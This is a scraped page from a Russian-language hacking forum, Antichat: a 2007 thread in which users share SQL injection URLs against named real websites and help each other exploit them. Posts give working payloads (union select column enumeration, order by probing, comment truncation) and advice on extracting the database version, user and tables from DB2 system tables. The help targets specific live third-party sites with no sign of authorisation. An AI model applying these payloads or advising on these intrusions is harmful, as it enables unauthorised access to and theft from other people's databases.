ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 24 из 1393 « Первая < 14 20 21 22 23 24 25 26 27 28 34741245241024 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 22.10.2007, 04:55
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Хм, да есть... просто во-первых меня смутило отсутсвие and, а во-вторых я наверное че-то напутал, так как когда я пробовал после его запроса (после отсечения /*) поставить кавычку вылетала ошибка, вобщем глюканул или я или... скорее всего я
__________________
Карфаген должен быть разрушен...
 

  #232  
Старый 27.10.2007, 01:41
cheb
Познающий
Регистрация: 31.07.2006
Сообщений: 46
Провел на форуме:
596615

Репутация: 18
По умолчанию
ребята, как раскрутить вот эту http://moto-life.com.ua/index/57' Sql иньекцию?
 

  #233  
Старый 27.10.2007, 19:41
Hood
Новичок
Регистрация: 15.03.2007
Сообщений: 5
Провел на форуме:
48930

Репутация: 0
По умолчанию
Помогите пожалуйста никак не могу подобрать количество полей.
Пробовал и order by и group by и вручную дошел до 43 ничего не получается???
Код HTML:
http://www.radiocomponent.net/prices.php?companyPK=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+companies+limit+0,1/*
Последний раз редактировалось Hood; 27.10.2007 в 19:45..
 

  #234  
Старый 30.10.2007, 00:18
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
Цитата:
ht_tp://www.skautai.lt/users.php?id=1)+order+by+1/*

помогите найти inj плз
 

  #235  
Старый 30.10.2007, 02:19
delay(0)
Участник форума
Регистрация: 22.11.2006
Сообщений: 117
Провел на форуме:
1813343

Репутация: 141
По умолчанию
Цитата:
http://sirius.ldz.lv/sari/saraksts.asp?lngg=xek
Возможно что-то вывести?
 

  #236  
Старый 30.10.2007, 08:27
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Хех, тут инъекция в select как я понял, это значит надо еще таблицу подбирать
вот пример того как:
Код:
http://sirius.ldz.lv/sari/saraksts.asp?lngg=lv%20from%20table1--
если подобрать это, то можно нарыть че нить например из системных таблиц sysibm можно узнать версию, пользователя и название базы, также после подбора можно будет узнать таблицы и колонки и соответственно вывести какуюто инфу из этого всего

ЗЫ я в DB2 неочень, так что поправьте меня если я неправ

ЗЗЫ Можно наверное и из других скриптов что то узнать, но меня самого именно этот вариант заинтересовал, т.к. инъекцию в Select я первый раз увидел
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 30.10.2007 в 08:31..
 

  #237  
Старый 30.10.2007, 19:03
3DXJ@@/\/
Новичок
Регистрация: 27.10.2007
Сообщений: 2
Провел на форуме:
15757

Репутация: 0
По умолчанию
вот кажется нашёл sql инекцию http://epood.atf.ee/index.php?categoryID=402' пробовал подобрать поля,перебрал 50 полей , но ничего не получилось подскажите что не так сделал и есть ли там вообще инекция?
п.с. подбирал:id=9999+union+select+null,null,nu ll......../* и так далее
 

  #238  
Старый 30.10.2007, 19:16
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию
http://epood.atf.ee/index.php?categoryID=-402+order+by+1/*
http://epood.atf.ee/index.php?categoryID=-402+union+select+1/*
смотреть вывод в коде страницы.
Последний раз редактировалось freddi; 30.10.2007 в 19:26..
 

  #239  
Старый 02.11.2007, 11:48
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию
Подскажите что можно сделать с этой скулей
код:

http://forum.tomsk.ru/forum.php?a=9&g=34+order+by+9/*&t=713344

при запросе юнион селект кидает на главную страницу
 

  #240  
Старый 04.11.2007, 01:19
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию
2 fobofob
На том же сайте вот тут http://forum.tomsk.ru/forum.php?a=24&user_id=-1357+union+select+111,222,3,4,555,666,7,8,9,10/*
такой проблемы нету.
Надеюсь помог
 
 
Страница 24 из 1393 « Первая < 14 20 21 22 23 24 25 26 27 28 34741245241024 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ